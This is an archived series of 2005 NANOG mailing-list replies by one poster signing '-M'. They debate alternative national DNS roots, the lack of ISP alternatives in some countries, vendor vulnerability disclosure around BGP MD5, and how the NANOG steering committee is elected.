-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Steve Gibbard Sent: Monday, July 04, 2005 1:20 AM To: [EMAIL PROTECTED] Subject: Re: Enable BIND cache server to resolve chinese domain name? On Mon, 4 Jul 2005, Mark Andrews wrote: [ SNIP ] That doesn't mean a competing system wouldn't work, for those who are using it. They'd just be limited in who they could talk to, and that generally wouldn't be very appealing. Are you just making noise here, Steve? That doesn't really say anything outside of status quo. That said, a big country implementing a new DNS root on a national scale may not have that problem. The telecom world is already full of systems that don't cross national borders. In the US case, think of all the cell phones that have international dialing turned off by default, That's a poor example. That's between the subscriber and their carrier, not a technical limitation. and all the 800 numbers whose owners probably aren't at all bothered by their inability to receive calls from other countries. That's also a poor example since there are work arounds for this technical issue. A system that would limit my ability to talk to people in other countries doesn't sound very appealing to me. I know. I know. Don't feed the trolls. -M
RE: ISP phishing
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Brad Knowles Sent: Thursday, June 30, 2005 12:48 PM To: Peter Corlett Cc: [EMAIL PROTECTED] Subject: Re: ISP phishing At 12:20 PM + 2005-06-29, Peter Corlett wrote: Sure Alice has control. Last week, I told my ISP where to stick their shoddy service and took my business elsewhere. You're assuming that there are always alternatives available for the entire world population. While there may usually be alternatives available in the most advanced western societies, you would be surprised at the types of places where you would think that there have to be alternatives, but in fact there aren't any. It also assumes that there are real differences in the alternatives in civilized society. In fact, you can only spell HTTP so many ways. There are less discernable differences these days. you would be surprised at the types of places where you would think that there have to be alternatives, but in fact there aren't any. There aren't alternatives because of the cost. In other cases the national climate i.e. protectionist of the incumbent or desire to hold it closely for political reasons i.e. China. -M
RE: md5 for bgp tcp sessions
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Todd Underwood Sent: Thursday, June 23, 2005 5:57 AM To: Richard A Steenbergen Cc: nanog@merit.edu Subject: Re: md5 for bgp tcp sessions ras, all, On Thu, Jun 23, 2005 at 12:14:12AM -0400, Richard A Steenbergen wrote: On Wed, Jun 22, 2005 at 10:04:09PM -0400, Todd Underwood wrote: rolling out magic code because your vendor tells you to is a bad idea; That's mostly the result of the calamitous failure in vulnerability release methodology, not Operator stupidity. -M
RE: [NON-OPERATIONAL] Re: NANOG Evolution
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Daniel Golding Sent: Friday, June 17, 2005 1:30 PM To: Randy Bush; Betty Burke Cc: nanog@merit.edu; [EMAIL PROTECTED] Subject: [NON-OPERATIONAL] Re: NANOG Evolution Randy, People's employers are posted at http://www.nanog.org/candidates05.html. It gets a bit complicated because some folks work at infrastructure companies - collocation/peering or DNS (Mark, Bill, Josh, Marty). It shouldn't be complicated. I think members are looking for Operator experience. I don't think it's too hard to make that easily discernable as long as it's fair. One thing that nags me a bit is we're not doing this at an actual NANOG meeting. Candidates don't get to discuss their qualifications and make a pitch to get elected. It's hard to determine if someone is suitable for the responsibilities if you cannot hear/see/get a feel for where they are coming from. This goes to leveling of the playing field. You may have a cruddy bio, but be a great candidate, and vice versa. How do you propose we get out the information as to why we should be elected to represent the group at large? [ dead horse ] Lastly, 6.2.1 Program Committee Membership and Selection is not acceptable, IMO, for the group at large. It should be normalized much like the Mailing List Admins. This disables the ability of the Steering Committee to lead. Ultimately, the SC is elected to represent the membership and carry out its will and that should be uniformly actionable across the board in order for the SC to be taken seriously by the group and by Merit. -M